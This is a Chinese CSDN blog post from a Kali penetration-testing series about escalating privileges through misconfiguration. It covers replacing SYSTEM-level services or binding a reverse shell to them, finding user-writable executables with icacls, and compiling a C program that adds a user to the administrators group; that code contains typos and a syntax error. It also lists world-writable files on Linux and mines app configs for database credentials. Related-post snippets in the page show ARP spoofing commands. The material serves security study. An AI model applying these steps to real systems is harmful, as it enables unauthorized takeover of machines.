小白日记25:kali渗透测试之提权(五)--利用配置不当提权

最新推荐文章于 2024-05-20 08:33:57 发布
最新推荐文章于 2024-05-20 08:33:57 发布
阅读量2.1k 收藏 5
点赞数
分类专栏: kali 文章标签: 配置不当 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZiXuanFY/article/details/52746913
版权

利用配置不当提权

与漏洞提权相比,更常见的方法。在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵。当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行提权。如:代码中没有进行参数过滤等操作。

  • 通过查看哪些服务默认以system权限启动,可尝试将其替换或绑定反弹shell程序
  • 了解NTFS权限允许users修改删除本身,则可利用其配置不当,完成提权

XP

安装了其他软件,打开services.msc本地服务设置,查看该软件是否以本地系统权限启动


查看应用程序NTFS权限是否可以被普通用户更改【即可执行文件路径】


##但不能替换应用程序,以免被发现【默认情况下,普通用户对操作系统中所有文件都没有修改权限】


命令行下快速查找当前系统下所有exe、con、ini执行程序的NTFS信息

1、icacls【windows 2003以后的系统中包含的程序】

icacls c:\windows\*.exe /save perm /T【查询结果保存为文本文件】

通过文本文件查找字符串F;;;BU


kali上生成shellcode把当前用户添加到管理员组

#include <stdlib.h>
int main()
{
   int i;
   i=system("net localgroup administarators a /add");
   return 0'
}
i586-mingw32msvc-gcc -o admin.exe admin.c
使用 commview小工具进行抓包

2、linux系统下查找权限设置不安全的程序

ls -l 【查找当前目录】

find / -perm 777 -exec ls -l {} \;  【/-perm 777 查找所有权限为777的文件;-exec 执行 ls -l ;\;  find命令以其结束】


提权只是思路

#若渗透进去的是应用程序

·应用系统的配置文件

通过应用连接数据库的配置文件,发现其连接的服务账号

后台服务运行账号【有可能root账号运行web服务】



子轩非鱼
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali-tutorial:kali渗透测试教程,Kali渗透测试指南,Kali渗透测试详解
05-12
Kali渗透教程 arpspoof -i eth0 -t 192.168.1.3 192.168.1.1 echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 192.168.1.3 192.168.1.1 echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t ...
安装kali-2021版本渗透测试系统-课程资料.rar
06-09
安装kali-2021版本渗透测试系统-课程资料 含kali镜像BT种子
小白日记24:kali渗透测试提权(四)--利用漏洞提权
ZiXuanFY的博客
10-09 5681
利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一、实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/library/security/ms11-080 1、通过searchsploit命令查找漏洞 【注:查找漏洞的命令行窗口要能完全显示Tit
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 893
​MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
小白日记21:kali渗透测试提权(一)--本地提权
ZiXuanFY的博客
09-23 5887
本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限权限提升漏洞通常是一种“辅助”性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更高的状态。但并不是说这种漏洞不严重、难以利用,往往这种漏洞更容易被利用、带来的后果比远程漏洞更可怕,这种漏洞实际上远比远程漏洞稀有,往往一个微软本地提权漏洞在国外的价格就可以到几百万美金。因为远程漏
小白日记26:kali渗透测试提权(六)--收集敏感信息,隐藏痕迹
ZiXuanFY的博客
10-09 3597
提权后操作 提权之后,要收集目标系统的重要信息 LINUX /etc/resolv.conf       #查看DNS配置,是否可以进行DNS篡改或劫持 /etc/passwd         #存放账号 /etc/shadow            #存放密码 whoami/who -a       #查看当前用户/查看所有用户 ifconfig -a
小白日记22:kali渗透测试提权(二)--抓包嗅探
ZiXuanFY的博客
09-23 5755
抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码。 Windows系统 1、Wirehshark 2、Omnipeek 3、commview 4、Sniffpass 只会抓取识别传输密码的明文协议,并提取密码 Linux系统 1、Tcpdump 2、Wirehshark 3、Dsniff 类似Sniffpas
小白日记23:kali渗透测试提权(三)--WCE、fgdump、mimikatz
ZiXuanFY的博客
09-24 5326
WCE windows身份认证过程 http://wenku.baidu.com/view/cf2ee127a5e9856a56126017.html #特例在登陆的目标服务器/系统,有一个w摘要安全包,会在本地缓存一个明文密码,当注销登陆后,会被删除 WCE (WINDOWS CREDENTIAL EDITOR) Windows Creden
Kali Linux渗透测试--windows 10入侵和提权过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploit对windows 10入侵测试 环境
小白日记28:kali渗透测试之Web渗透-扫描工具-Nikto
ZiXuanFY的博客
10-09 1万+
#WEB渗透 靶机:metasploitable 靶场:DVWA【默认账号/密码:admin/password】 #新手先将DVWA的安全性,调到最低,可容易发现漏洞 侦察【减少与目标系统交互】 Httrack:将WEB可下载的页面下载到本机,再进行本地检查【kali下安装】 ##可到此网站获取代理:hidemyass.com【免费代理需小心】
小白日记29:kali渗透测试之Web渗透-扫描工具-Vega
ZiXuanFY的博客
10-11 8417
WEB扫描工具-Vega  纯图形化界面,Java编写的开源web扫描器。两种工作模式:扫描模式和代理模式【主流扫描功能】。用于爬站。处理表单,注入测试等。支持SSL:http://vega/ca.crt 专注于应用程序代码方面的漏洞 Vega #基于字典发现网站目录 代理模式 #设置外部代理服务器 #删除user-
小白日记30:kali渗透测试之Web渗透-扫描工具-Skipfish
ZiXuanFY的博客
10-11 1万+
WEB渗透-skipfish Skipfish是一个命令行模式,以C语言编写的积极的Web应用程序的安全性侦察工具,没有代理模式。 它准备了一个互动为目标的网站的站点地图进行一个递归爬网和基于字典的探头。 优点:速度比较快【多路单线程,全异步网络I/O,消除内存管理和调度开销,支持启发式自动内容识别】,误报相对低 使用方式:【https://my.oschina.net/u/
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
无线渗透测试入门指南kali-linux-wireless-pentest-master.zip
01-30
无线渗透测试入门指南kali-linux-wireless-pentest-master.zip
小白日记12:kali渗透测试之服务扫描(二)-SMB扫描
ZiXuanFY的博客
09-12 1万+
SMB扫描 Server Message Block 协议。与其他标准的TCP/IP协议不同,SMB协议是一种复杂的协议,因为随着Windows计算机的开发,越来越多的功能被加入到协议中去了,很难区分哪些概念和功能应该属于Windows操作系统本身,哪些概念应该属于SMB 协议。因为该协议很复杂,所以是微软历史上出现安全问题最多的协议。 1、Nmap 最简单的方法:扫描其固定
小白日记1:kali环境Wpscan渗透Wordpress
ZiXuanFY的博客
09-05 1万+
一、什么是Wpscan?什么是Wordpres?     1.Wpscan      WPScan是一款针对wwordpress的安全扫描软件;可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。     2.Wordpress      WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,用户可以在支持PHP和MySQL数据
小白日记11:kali渗透测试之服务扫描-banner、dmitry、nmap特征库、操作系统识别、SNMP
ZiXuanFY的博客
09-11 8855
服务扫描 不能单纯的以端口辨别服务。很多网络服务是漏洞频发的高危对象,对网络上的特定服务进行扫描,往往能让我们少走弯路,增加渗透成功的几率。确定开放端口后,通常会对相应端口上所运行服务的信息进行更深入的挖掘,通常称为服务查点。 1、Banner捕获(最主要最简单,也是最不准确) 连接服务器的端口,利用其返回的banner信息,但可能是管理员伪造的。 【软件开发商软件名称,服务类
实战指南:利用Kali Linux进行渗透测试
利用Kali进行黑客攻击:实战渗透测试技术》是一本由James Broad和Andrew Bindner合著的专业书籍,它全面指导读者通过当前最先进的Live CD/USB系统Kali Linux进行渗透测试。本书旨在提供一个实用且深入的指南,帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值